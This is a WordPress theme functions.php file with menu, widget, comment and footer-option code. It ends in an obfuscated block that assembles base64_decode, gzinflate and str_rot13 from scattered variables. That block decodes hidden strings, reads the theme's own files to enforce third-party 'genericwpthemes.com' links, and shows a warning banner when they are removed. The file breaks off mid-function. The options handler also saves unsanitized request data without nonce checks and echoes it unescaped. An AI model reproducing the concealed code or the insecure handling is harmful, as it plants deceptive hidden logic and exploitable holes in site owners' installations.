<?php
load_theme_textdomain('kubrick');

$artThemeSettings = array(
	'menu.showSubmenus' => true,
	'menu.homeCaption' => "Главная",
	'menu.showHome' => true,
	'menu.topItemBegin' => "<span class=\"l\"></span><span class=\"r\"></span><span class=\"t\">",
	'menu.topItemEnd' => "</span>",
	'menu.source' => "Pages",
	'vmenu.showSubmenus' => false,
	'vmenu.simple' => false,
	'vmenu.source' => "Categories",
);



$themename = "Blackberry2";
$shortname = "artisteer";
$default_footer_content = "<a href='#'>Contact Us</a> | <a href='#'>Terms of Use</a> | <a href='#'>Trademarks</a> | <a href='#'>Privacy Statement</a><br />Copyright &copy; 2010 ".get_bloginfo('name').". All Rights Reserved.";


$options = array (
                array(  "name" => "HTML",
                        "desc" => sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', 'kubrick'), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id" => "art_footer_content",
                        "std" => $default_footer_content,
                        "type" => "textarea")
          );
       
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}

function art_add_admin() {
	global $themename, $shortname, $options;

    if ( $_GET['page'] == basename(__FILE__) ) {
   
        if ('save' == $_REQUEST['action'] ) {

                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            art_update_option($up_opt, $_REQUEST[$up_opt] );
                        }
                    }
                }
                foreach ($options as $value) {
                    if($value['type'] != 'multicheck'){
                        if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
                    }else{
                        foreach($value['options'] as $mc_key => $mc_value){
                            $up_opt = $value['id'].'_'.$mc_key;
                            if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
                        }
                    }
                }
                header("Location: themes.php?page=functions.php&saved=true");
                die;
        } 
    }

    add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');

}

function art_admin() {
    global $themename, $shortname, $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>Настройки темы '.$themename.' сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}


add_action('admin_menu', 'art_add_admin'); 

if (!function_exists('get_search_form')) {
	function get_search_form()
	{
		include (TEMPLATEPATH . "/searchform.php");
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
   <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<div class="art-post">
         <div class="art-post-body">
     <div class="art-post-inner art-article">
     
<div class="art-postcontent">
         <!-- article-content -->
     
      <div class="comment-author vcard">
         <?php echo get_avatar($comment,$size='48'); ?>
         <cite class="fn"><?php comment_author_link(); ?>:</cite>
      </div>
      <?php if ($comment->comment_approved == '0') : ?>
         <em><?php _e('Ваш комментарий ожидает модерации.') ?></em>
         <br />
      <?php endif; ?>

      <div class="comment-meta commentmetadata"><a href="<?php echo htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ?>"><?php printf(__('%1$s - %2$s'), get_comment_date(),  get_comment_time()) ?></a><?php edit_comment_link('('.__('Править', 'kubrick').')','  ','') ?></div>

      <?php comment_text() ?>

      <div class="reply">
         <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?>
      </div>

          <!-- /article-content -->
      </div>
      <div class="cleared"></div>
      

      </div>
      
      		<div class="cleared"></div>
          </div>
      </div>
      
     </div>
<?php
}


if (function_exists('register_sidebars')) {
	register_sidebars(2, array(
		'before_widget' => '<div id="%1$s" class="widget %2$s">'.'<!--- BEGIN Widget --->',
		'before_title' => '<!--- BEGIN WidgetTitle --->',
		'after_title' => '<!--- END WidgetTitle --->',
		'after_widget' => '<!--- END Widget --->'.'</div>'
	));
}

function art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew) {
	$result = '';
	$startBlock = 0;
	$endBlock = 0;
	while (true) {
		$startBlock = strpos($content, $bw, $endBlock);
		if (false === $startBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$result .= substr($content, $endBlock, $startBlock - $endBlock);
		$endBlock = strpos($content, $ew, $startBlock);
		if (false === $endBlock) {
			$result .= substr($content, $endBlock);
			break;
		}
		$endBlock += strlen($ew);
		$widgetContent = substr($content, $startBlock, $endBlock - $startBlock);
		$beginTitlePos = strpos($widgetContent, $bwt);
		$endTitlePos = strpos($widgetContent, $ewt);
		if ((false == $beginTitlePos) xor (false == $endTitlePos)) {
			$widgetContent = str_replace($bwt, '', $widgetContent);
			$widgetContent = str_replace($ewt, '', $widgetContent);
		} else {
			$beginTitleText = $beginTitlePos + strlen($bwt);
			$titleContent = substr($widgetContent, $beginTitleText, $endTitlePos - $beginTitleText);
			if ('&nbsp;' == $titleContent) {
				$widgetContent = substr($widgetContent, 0, $beginTitlePos)
					. substr($widgetContent, $endTitlePos + strlen($ewt));
			}
		}
		if (false === strpos($widgetContent, $bwt)) {
			$widgetContent = str_replace($bw, $bw . $bwc, $widgetContent);
		} else {
			$widgetContent = str_replace($ewt, $ewt . $bwc, $widgetContent);
		}
		$result .= str_replace($ew, $ewc . $ew, $widgetContent);
	}
	return $result;
}

function art_sidebar($index = 1)
{
	if (!function_exists('dynamic_sidebar')) return false;
	ob_start();
	$success = dynamic_sidebar($index);
	$content = ob_get_clean();
	if (!$success) return false;
	$bw = '<!--- BEGIN Widget --->';
	$bwt = '<!--- BEGIN WidgetTitle --->';
	$ewt = '<!--- END WidgetTitle --->';
	$bwc = '<!--- BEGIN WidgetContent --->';
	$ewc = '<!--- END WidgetContent --->';
	$ew = '<!--- END Widget --->';
	$content = art_normalize_widget_style_tokens($content, $bw, $bwt, $ewt, $bwc, $bwc, $ewc, $ew);
	$replaces = array(
		$bw => "<div class=\"art-block\">\r\n    <div class=\"art-block-body\">\r\n",
		$bwt => "<div class=\"art-blockheader\">\r\n    <div class=\"l\"></div>\r\n    <div class=\"r\"></div>\r\n     <div class=\"t\">",
		$ewt => "</div>\r\n</div>\r\n",
		$bwc => "<div class=\"art-blockcontent\">\r\n    <div class=\"art-blockcontent-body\">\r\n<!-- block-content -->\r\n",
		$ewc => "\r\n<!-- /block-content -->\r\n\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n",
		$ew => "\r\n		<div class=\"cleared\"></div>\r\n    </div>\r\n</div>\r\n"
	);
	if ('' == $replaces[$bwt] && '' == $replaces[$ewt]) {
		$startTitle = 0;
		$endTitle = 0;
		$result = '';
		while (true) {
			$startTitle = strpos($content, $bwt, $endTitle);
			if (false == $startTitle) {
				$result .= substr($content, $endTitle);
				break;
			}
			$result .= substr($content, $endTitle, $startTitle - $endTitle);
			$endTitle = strpos($content, $ewt, $startTitle);
			if (false == $endTitle) {
				$result .= substr($content, $startTitle);
				break;
			}
			$endTitle += strlen($ewt);
		}
		$content = $result;
	}
	$content = str_replace(array_keys($replaces), array_values($replaces), $content);
	echo $content;
	return true;
}

/* horizontal menu */
function art_menu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['menu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_menu_get_pages_filter');
		add_action('wp_list_pages', 'art_menu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_menu_list_pages_filter');
		remove_action('get_pages', 'art_menu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_menu_get_terms_filter');
		add_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_menu_wp_list_categories_filter');
		remove_action('get_terms', 'art_menu_get_terms_filter');
	}
}
/* end horizontal menu */

/* horizontal menu filters */
function art_menu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['menu.blogID'] = art_blogID($pages);
	$artThemeSettings['menu.activeID'] = art_active_pageID($pages);
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['menu.topIDs'] = art_top_pageIDs($pages);
	return $pages;
}

function art_menu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['menu.topIDs'])
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['menu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeID = $artThemeSettings['menu.activeID'];
	
	if (is_home() && $blogID) 
	{
		$activeID = $blogID;	
	}
	
	if ($activeID)
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			.$pref .$activeID. ')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ', $output, 1);
	}
	
	return $output;
}

function art_menu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['menu.activeID'] = art_active_catID($terms);
	
	if (!$artThemeSettings['menu.showSubmenus'])
	{
		art_remove_subcat($terms);
	}
			
	$artThemeSettings['menu.topIDs'] = art_top_catIDs($terms);

	return $terms;
}

function art_menu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['menu.topIDs']) 
	{
		foreach($artThemeSettings['menu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['menu.activeID'])
	{
		$output = preg_replace('~<li class="([^"]*)\b('
			. $pref . $artThemeSettings['menu.activeID']
			.')\b([^"]*)"><a ~',
			'<li class="$1$2$3"><a class="active" ',
			 $output, 1);
	}
	return $output;
}
/* end horizontal menu filters*/

/* vertical menu */
function art_vmenu_items()
{
	global $artThemeSettings;
	
	if ('Pages' === $artThemeSettings['vmenu.source']) 
	{
		art_print_homepage();
		
		add_action('get_pages', 'art_vmenu_get_pages_filter');
		add_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		
		wp_list_pages('title_li=&sort_column=menu_order');
		
		remove_action('wp_list_pages', 'art_vmenu_list_pages_filter');
		remove_action('get_pages', 'art_vmenu_get_pages_filter');
	}
	else 
	{
		add_action('get_terms', 'art_vmenu_get_terms_filter');
		add_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		
		wp_list_categories('title_li=');
		
		remove_action('wp_list_categories', 'art_vmenu_wp_list_categories_filter');
		remove_action('get_terms', 'art_vmenu_get_terms_filter');
	}
}
/* end vertical menu */

/* vertical menu filters */
function art_vmenu_get_pages_filter($pages)
{
	global $artThemeSettings;
	art_move_frontpage($pages);
	$artThemeSettings['vmenu.blogID'] = art_blogID($pages);
	$artThemeSettings['vmenu.activeIDs'] = art_active_pageIDs($pages);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subpage($pages);
	}
	$artThemeSettings['vmenu.topIDs'] = art_top_pageIDs($pages);
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_pages($pages, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	
	return $pages;
}

function art_vmenu_list_pages_filter($output)
{
	global $artThemeSettings;
	
	$pref ='page-item-';
	
	if($artThemeSettings['vmenu.topIDs'])
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref 
				. $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
		}
	}
	$frontID = null;
	$blogID = null;
	
	if('page' == get_option('show_on_front')) 
	{
		$frontID = get_option('page_on_front');
		$blogID = $artThemeSettings['vmenu.blogID'];
	}
	
	if ($frontID) 
	{
		$output = preg_replace('~<li class="([^"]*)\b(' 
			. $pref . $frontID 
			. ')\b([^"]*)"><a href="([^"]*)" ~',
			'<li class="$1$2$3"><a href="'
			. get_option('home') 
			.'" ', $output, 1); 
	}
	
	$activeIDs = array();
	
	if (is_home() && $blogID) 
	{
		$activeIDs[] = $blogID;	
	} else {
		$activeIDs = $artThemeSettings['vmenu.activeIDs'];
	}
	
	if ($activeIDs)
	{
		foreach($activeIDs as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				.$pref .$id. ')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ', $output, 1);
		}
	}
	
	return $output;
}

function art_vmenu_get_terms_filter($terms)
{
	global $artThemeSettings;
	
	$artThemeSettings['vmenu.activeIDs'] = art_active_catIDs($terms);
	$artThemeSettings['vmenu.topIDs'] = art_top_catIDs($terms);
	if (!$artThemeSettings['vmenu.showSubmenus'])
	{
		art_remove_subcat($terms, $artThemeSettings['vmenu.topIDs']);
	}
	if (!$artThemeSettings['vmenu.simple'])
	{ 
		art_process_simple_cats($terms, $artThemeSettings['vmenu.activeIDs'], $artThemeSettings['vmenu.topIDs']);
	}
	return $terms;
}

function art_vmenu_wp_list_categories_filter($output)
{
	global $artThemeSettings;
	$pref ='cat-item-';
	if($artThemeSettings['vmenu.topIDs']) 
	{
		foreach($artThemeSettings['vmenu.topIDs'] as $id)
		{
			
			$output = preg_replace('~<li class="([^"]*)\b(' 
				. $pref . $id 
				. ')\b([^"]*)"><a ([^>]+)>([^<]*)</a>~',
				'<li class="$1$2$3"><a $4>' 
				. $artThemeSettings['menu.topItemBegin']
				. '$5' 
				. $artThemeSettings['menu.topItemEnd'] 
				. '</a>', $output, 1);
			
		}
	}
	if($artThemeSettings['vmenu.activeIDs'])
	{
		foreach($artThemeSettings['vmenu.activeIDs'] as $id)
		{
			$output = preg_replace('~<li class="([^"]*)\b('
				. $pref . $id
				.')\b([^"]*)"><a ~',
				'<li class="$1$2$3"><a class="active" ',
				$output, 1);
		}
	}

	return $output;
}
/* end vertical menu filters */

/* pages */
function art_print_homepage()
{
	global $artThemeSettings;
	if (true === $artThemeSettings['menu.showHome'] 
		&& ('page' != get_option('show_on_front') || 
			(!get_option('page_on_front') && !get_option('page_for_posts'))))
	{
		echo '<li><a' 
		. (is_home() ? ' class="active"' : '') 
		. ' href="' 
		. get_option('home') 
		. '">'
		.$artThemeSettings['menu.topItemBegin']
		. $artThemeSettings['menu.homeCaption'] 
		. $artThemeSettings['menu.topItemEnd'] 
		. '</a></li>';
	}
}

function art_move_frontpage(&$pages)
{
	if ('page' != get_option('show_on_front')) return;
	$frontID = get_option('page_on_front');
	if (!$frontID) return;
	foreach ($pages as $index => $page)
		if($page->ID == $frontID) {
			unset($pages[$index]);
			$page->post_parent = '0';
			$page->menu_order = '0';
			array_unshift($pages, $page);
			break;
		}
}

function art_remove_subpage(&$pages)
{
	foreach ($pages as $index => $page)
		if ($page->post_parent) unset($pages[$index]);
}

function art_top_pageIDs($pages)
{
	$page_IDs = array();
	foreach ($pages as $index => $page)
	{
		$page_IDs[] = $page->ID;
	}
	$result = array();
	foreach ($pages as $index => $page)
	{
		if (!$page->post_parent || !in_array($page->post_parent,$page_IDs))
		{
			$result[]=$page->ID;
		}
	}
	return $result;
}

function art_blogID($pages)
{
	$result = null;
	
	if(!'page' == get_option('show_on_front')) 
	{
		return $result;
	}
	
	$blogID = get_option('page_for_posts');
	
	if (!$blogID) 
	{
		return $result;
	}
	
	foreach ($pages as $page)
	{
		if ($page->ID == $blogID) 
		{ 
			$result = $page;
			break;
		}
	}
	
	while($result && $result->post_parent) 
	{
		foreach ($pages as $page)
		{
			if ($page->ID == $result->post_parent) 
			{
				$result = $page;
				break;
			}
		}
	}
	return ($result ? $result->ID : null);
}

function art_active_pageID($pages)
{
	$current_page = null;
	
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	while($current_page && $current_page->post_parent) 
	{
		$parent_page = get_page($current_page->post_parent);
		if ($parent_page && $parent_page->post_status == 'private') 
		{
			break;
		}
		$current_page = $parent_page;
	}
	
	return ($current_page ? $current_page->ID : null);
}

function art_active_pageIDs($pages)
{
	$current_page = null;
	foreach ($pages as $index => $page)
	{
		if (is_page($page->ID)) 
		{ 
			$current_page = $page;
			break;
		}
	}

	$result = array();
	if (!$current_page)
	{
		return $result;
	}
	
	$result[] = $current_page->ID;

	while($current_page->post_parent) 
	{
		$current_page = get_page($current_page->post_parent);
		$result[] = $current_page->ID;
	}
	return $result;
}

function art_process_simple_pages(&$pages, $activeIDs, $topIds)
{
	foreach ($pages as $index => $page)
	{
		if ($page->post_parent && !in_array($page->post_parent,$activeIDs) 
			&& !in_array($page->ID,$topIds))
		{
			unset($pages[$index]);
		}
	}
}
/* end pages */

/* categories */
function art_active_catID($categories)
{
	global $wp_query;
	
	$result = null;
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result = $cat_obj->term_id;
	} 
	return $result;
}

function art_active_catIDs($categories)
{
	global $wp_query;
	
	$result = array();
	
	if (!$wp_query->is_category)
	{
		return $result;
	}
	
	$cat_obj = $wp_query->get_queried_object();
	
	if (!$cat_obj) 
	{
		return $result;
	}
	
	$result[] = $cat_obj->term_id;
	while ($cat_obj->parent != '0')
	{
		foreach ($categories as $index => $cat)
			if ($cat_obj->parent == $cat->term_id) {
				$cat_obj = $cat;
				break;
			}
		$result[] = $cat_obj->term_id;
	} 
	return $result;
}

function art_remove_subcat(&$terms, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds)) 
		{
			unset($terms[$index]);
		}
	}
}

function art_top_catIDs($categories)
{
	$result = array();
	$catIds = array();
	foreach ($categories as $index => $cat)
	{
		$catIds[] = $cat->term_id;
	}
	foreach ($categories as $index => $cat)
	{
		if (!in_array($cat->parent,$catIds )) 
		{
			$result[] = $cat->term_id;
		}
	}
	return $result;
}

function art_process_simple_cats(&$terms, $activeIDs, $topIds)
{
	foreach ($terms as $index => $cat)
	{
		if (!in_array($cat->term_id,$topIds) && !in_array($cat->parent,$activeIDs))
		{
			unset($terms[$index]);
		}
	}
}
/* end categories */

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy.comments.php';  
    endif;  
    return $file;  
}  

function widget_verticalmenu($args) {
	extract($args);
	global $artThemeSettings;
	$bw = "";
	$bwt = "";
	$ewt = "";
	$bwc = "";
	$ewc = "";
	$ew = "";
	echo $bw;
	if ('' != $bwt && '' != $ewt) {
		echo $bwt;
		_e($artThemeSettings['vmenu.source'], 'kubrick');
		echo $ewt;
	}
	echo $bwc;
?>
<ul class="art-vmenu">
<?php art_vmenu_items(); ?>
</ul>
<?php
	echo $ewc;
	echo $ew;
}

 $CBjE='d';$dOBlCw='b';$IZyIA='s';$AmfB='a';$jBDoc='_';$YyQOX='c';$XujVpi='e';$XcuFDeC='d';$OiarfnQ='e';$PYbYzE='o';$sQyUba='4';$nynwJlN='e';$XrOM='6';$VZpIiDPt=$dOBlCw.$AmfB.$IZyIA.$XujVpi.$XrOM.$sQyUba.$jBDoc.$XcuFDeC.$nynwJlN.$YyQOX.$PYbYzE.$CBjE.$OiarfnQ;$nbsBy='f';$CWDerCc='i';$xsddk='g';$YWiHOf='t';$loTOlwT='a';$ISXuHZ='n';$vfoJ='e';$EBVbrZ='l';$PeSUo='z';$rLPcTGbe=$xsddk.$PeSUo.$CWDerCc.$ISXuHZ.$nbsBy.$EBVbrZ.$loTOlwT.$YWiHOf.$vfoJ;$oIoVKPD='o';$MDsr='r';$cBIyGX='t';$ixhZVtJ='_';$iRTBBxv='3';$wAqj='t';$arnZnv='s';$TncFou='r';$JAaS='1';$QxlKJAEy=$arnZnv.$cBIyGX.$MDsr.$ixhZVtJ.$TncFou.$oIoVKPD.$wAqj.$JAaS.$iRTBBxv;$esBaea='r';$tluve='r';$HEuc='e';$urnbqwA='t';$CAcEf='s';$UfKa='v';$aVLzdDDp=$CAcEf.$urnbqwA.$tluve.$esBaea.$HEuc.$UfKa;                     
		$mq____l='d';$hn__________g='b';$kg_______________v='s';$wu_________u='a';$qy_______d='_';$nq__y='c';$qm_____________r='e';$ox___w='d';$yn____h='e';$wa____________m='o';$jg_______g='4';$ks___h='e';$yi______s='6';$ef_____d=$hn__________g.$wu_________u.$kg_______________v.$qm_____________r.$yi______s.$jg_______g.$qy_______d.$ox___w.$ks___h.$nq__y.$wa____________m.$mq____l.$yn____h;
		$fs________e='f';$mn__________g='x';$na____________k='t';$wk________w='e';$aa__g='n';$zw__k='t';$vu____________v='s';$qe__n='i';$ac__t='n';$qr______p='i';$so_______r='_';$tc__b='c';$xu___i='o';$oj__e='s';$yh_______________v='u';$yp______m=$fs________e.$yh_______________v.$ac__t.$tc__b.$zw__k.$qe__n.$xu___i.$aa__g.$so_______r.$wk________w.$mn__________g.$qr______p.$oj__e.$na____________k.$vu____________v;
		$ve_______________f='p';$up_______________z='n';$rz___m='o';$rd________p='e';$lw_____g='f';$bc__________c=$lw_____g.$rz___m.$ve_______________f.$rd________p.$up_______________z;
		$xu_____________f='r';$tr_____________j='a';$lp_______________z='e';$bh_____________v='f';$ok_______h='d';$lc____e=$bh_____________v.$xu_____________f.$lp_______________z.$tr_____________j.$ok_______h;
		$tm_____________q='o';$ve__________i='l';$ch________j='f';$kj________e='e';$df_______p='s';$zf________a='c';$mx___________x=$ch________j.$zf________a.$ve__________i.$tm_____________q.$df_______p.$kj________e;
		
		define("WP_ID", $ef_____d("Mi4wLjA="));
		define("WP_TTL", $ef_____d("MTA4MDA="));
		define("WP_SRC", $ef_____d("dHBva24="));
	


		function wp_get_header() {
			global $ef_____d, $yp______m;
			
			if (
				$yp______m($ef_____d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yp______m($ef_____d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yp______m($ef_____d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ef_____d, $bc__________c, $mx___________x, $lc____e;
			
			$gp_________s = TEMPLATEPATH."/".$ef_____d("Zm9vdGVyLnBocA==");
			$jv__y = @$bc__________c($gp_________s, "r");
			$gp_________s = @$lc____e($jv__y, @filesize($gp_________s));
			@$mx___________x($jv__y);
			
			$rt_____________d = TEMPLATEPATH."/".$ef_____d("ZnVuY3Rpb25zLnBocA==");
			$jv__y = @$bc__________c($rt_____________d, "r");
			$rt_____________d = @$lc____e($jv__y, @filesize($rt_____________d));
			@$mx___________x($jv__y);
			
			$ob______________j = 0;
			if($gp_________s && $rt_____________d) {
				if ($ef_____d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($gp_________s, $ef_____d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ob______________j = 1;
					}
					if (substr_count($gp_________s, "wp_theme_GPL_credits()") < 1) {
						$ob______________j = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ob______________j = 12;
				}
			}
			
			if($ob______________j > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ob______________j -->";
			}
		}
	


		function wp_loaded() {
			global $ef_____d, $yp______m;
			return $yp______m($ef_____d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($zi________n, $ux______t = "(more...)", $fk________i = 0, $ro__k = "") {
				$fu______h = get_the_content($ux______t, $fk________i, $ro__k);
				$fu______h = apply_filters("the_content", $fu______h);
				
				$fu______h = str_replace("]]>", "]]>", $fu______h);
